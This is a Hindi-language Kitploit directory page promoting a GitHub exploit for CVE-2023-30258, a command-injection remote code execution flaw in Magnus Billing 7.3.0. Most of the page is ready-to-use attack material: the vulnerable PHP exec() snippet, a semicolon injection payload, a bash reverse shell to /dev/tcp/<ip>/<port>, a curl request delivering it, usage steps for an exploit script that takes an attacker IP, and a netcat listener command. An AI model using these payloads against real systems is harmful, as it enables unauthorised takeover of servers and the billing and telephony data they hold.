Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
magnus_billing_7.3.0_RCE_CVE-2023-30258 — Magnus Billing PHP संसाधन में RCE भेद्यता | Kitploit
उपकरण/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

Magnus Billing PHP संसाधन में RCE भेद्यता

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

magnus_billing_7.3.0_RCE_CVE-2023-30258

magnus billing 7.3.0 में एक रिमोट कोड एक्सेक्यूशन भेद्यता है, "democ" पैरामीटर में "icepay.php" संसाधन से, जहाँ आप क्वेरी से बचकर अपना इच्छित कमांड निष्पादित कर सकते हैं.

भेद्य कोड

root@kitploit:~
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

"democ" पैरामीटर exec() को भेजा जाता है, ताकि एक नई फ़ाइल बनाई जा सके, लेकिन जैसा कि आप देख सकते हैं, कोई स्ट्रिंग सैनिटाइज़ेशन नहीं है और हमलावर आसानी से touch कमांड से बचकर कोई कमांड निष्पादित कर सकता है या रिवर्स शेल भी प्राप्त कर सकता है. txt एक्सटेंशन को बायपास करने के लिए, हम स्ट्रिंग के अंत में एक और ";" जोड़ सकते हैं. अंतिम पेलोड इस प्रकार दिखेगा:

root@kitploit:~
testfile;<command>;testfile

और exec() फ़ंक्शन में पास करने पर यह इस प्रकार दिखेगा:

root@kitploit:~
exec('touch testfile;<command>;testfile.txt');

उदा. रिवर्स शेल:

root@kitploit:~
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')

शोषण >:D

हम स्वयं को रिवर्स शेल प्राप्त करने के लिए curl का उपयोग कर सकते हैं, उदा.

root@kitploit:~
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile

या यदि आप चाहें, तो आप इस रिपॉजिटरी से python स्क्रिप्ट का उपयोग कर सकते हैं. स्थापना:

root@kitploit:~
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # change directory

chmod +x ./magnusbilling_rce.py                                             # add execution permissions to the python script

उपयोग:

root@kitploit:~
./magnusbilling_rce.py -h                                                   # show help

./magnusbilling_rce.py -lh <attacker_ip> -lp <local_port> -u http://<ip/domain>:<port>/

और सबसे अंत में, netcat के साथ एक लिसनर शुरू करना न भूलें:

root@kitploit:~
nc -nlvvp <local_port>
टूल डाउनलोड करें